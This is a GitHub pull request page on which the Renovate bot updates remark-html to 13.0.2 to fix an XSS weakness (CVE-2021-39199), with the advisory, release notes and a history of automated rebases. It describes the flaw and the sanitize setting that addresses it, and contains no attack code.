Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

fix(deps): update dependency remark-html to v13.0.2 [security] #506

Open
wants to merge 1 commit into
base: main
Choose a base branch
from
Open

fix(deps): update dependency remark-html to v13.0.2 [security] #506

wants to merge 1 commit into from

Conversation

renovate[bot]
Copy link

@renovate renovate bot commented Sep 8, 2021
edited
Loading

This PR contains the following updates:

Package Change Age Adoption Passing Confidence
remark-html 13.0.1 -> 13.0.2 age adoption passing confidence

GitHub Vulnerability Alerts

CVE-2021-39199

Impact

The documentation of remark-html has mentioned that it was safe by default. In practise the default was never safe and had to be opted into. This means arbitrary HTML can be passed through leading to potential XSS attacks.

Patches

The problem has been patched in 13.0.2 and 14.0.1: remark-html is now safe by default, and the implementation matches the documentation.

Workarounds

On older affected versions, pass sanitize: true, like so:

-  .use(remarkHtml)
+  .use(remarkHtml, {sanitize: true})

References

n/a

For more information

If you have any questions or comments about this advisory:

Release Notes

remarkjs/remark-html (remark-html)

v13.0.2

Compare Source

  • b0b1ba5 Fix to sanitize by default
    The docs have always said remark-html is safe by default. It wasn’t and this patches that.

    If you do want to be unsafe, use remark-html with sanitize: false:

    -  .use(remarkHtml)
+  .use(remarkHtml, {sanitize: false})

Full Changelog: remarkjs/remark-html@13.0.1...13.0.2

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

@vercel
Copy link

vercel bot commented Sep 8, 2021
edited
Loading

This pull request is being automatically deployed with Vercel (learn more).
To see the status of your deployment, click below or on the icon next to each commit.

🔍 Inspect: https://vercel.com/neontribe/neontribe-www/8s41xd53MVjxChoRUbAJQBHYpNba
✅ Preview: https://neontribe-www-git-renovate-npm-remark-html-vul-1ce54d-neontribe.vercel.app

@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 75e33e8 to d25121a Compare October 7, 2021 11:25
@Nikomus Nikomus added the dependencies Pull requests that update a dependency file label Nov 10, 2021
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from d25121a to 0992f3c Compare December 13, 2021 15:27
@renovate renovate bot changed the title Update dependency remark-html to v13.0.2 [SECURITY] fix(deps): update dependency remark-html to v13.0.2 [security] Mar 26, 2022
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 0992f3c to 21607eb Compare March 26, 2022 13:34
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 21607eb to 373bc70 Compare April 11, 2022 17:33
@renovate renovate bot changed the title fix(deps): update dependency remark-html to v13.0.2 [security] Update dependency remark-html to v13.0.2 [SECURITY] Apr 21, 2022
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 373bc70 to 1db7b95 Compare April 26, 2022 11:12
@vercel
Copy link

vercel bot commented Apr 26, 2022
edited
Loading

The latest updates on your projects. Learn more about Vercel for Git ↗︎

Name Status Preview Comments Updated (UTC)
neontribe-www ✅ Ready (Inspect) Visit Preview 💬 Add feedback Sep 9, 2024 1:27pm

@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 1db7b95 to 35398f4 Compare May 3, 2022 13:03
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 35398f4 to 05f4ea3 Compare June 23, 2022 11:40
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 05f4ea3 to c0a93a4 Compare June 24, 2022 13:33
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from c0a93a4 to 9f6e7e1 Compare June 30, 2022 12:15
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 9f6e7e1 to 98dc87b Compare July 4, 2022 16:47
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 98dc87b to 5b7b7eb Compare August 2, 2022 18:00
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 5b7b7eb to dc9a097 Compare August 5, 2022 12:01
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 5490b09 to 6e3d449 Compare May 3, 2024 10:51
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 6e3d449 to 1c49410 Compare May 24, 2024 09:24
@renovate renovate bot changed the title fix(deps): update dependency remark-html to v13.0.2 [security] Update dependency remark-html to v13.0.2 [SECURITY] May 24, 2024
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 1c49410 to 9517c3d Compare May 31, 2024 09:25
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 9517c3d to dd304e6 Compare June 5, 2024 13:27
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from dd304e6 to 7e2eac6 Compare June 5, 2024 14:43
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 7e2eac6 to cc78c09 Compare June 10, 2024 08:52
@renovate renovate bot changed the title Update dependency remark-html to v13.0.2 [SECURITY] fix(deps): update dependency remark-html to v13.0.2 [security] Jun 10, 2024
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from cc78c09 to 95e9d01 Compare June 10, 2024 09:49
@renovate renovate bot changed the title fix(deps): update dependency remark-html to v13.0.2 [security] Update dependency remark-html to v13.0.2 [SECURITY] Jun 10, 2024
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 95e9d01 to ce76074 Compare July 5, 2024 14:35
@renovate renovate bot changed the title Update dependency remark-html to v13.0.2 [SECURITY] fix(deps): update dependency remark-html to v13.0.2 [security] Jul 5, 2024
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from ce76074 to afabab2 Compare July 24, 2024 09:23
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from afabab2 to 42694a4 Compare August 14, 2024 09:40
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 42694a4 to 8f676ad Compare September 3, 2024 16:02
@renovate renovate bot force-pushed the renovate/npm-remark-html-vulnerability branch from 8f676ad to 24233ec Compare September 9, 2024 13:24
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees
No one assigned
Labels
dependencies Pull requests that update a dependency file
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
1 participant
@Nikomus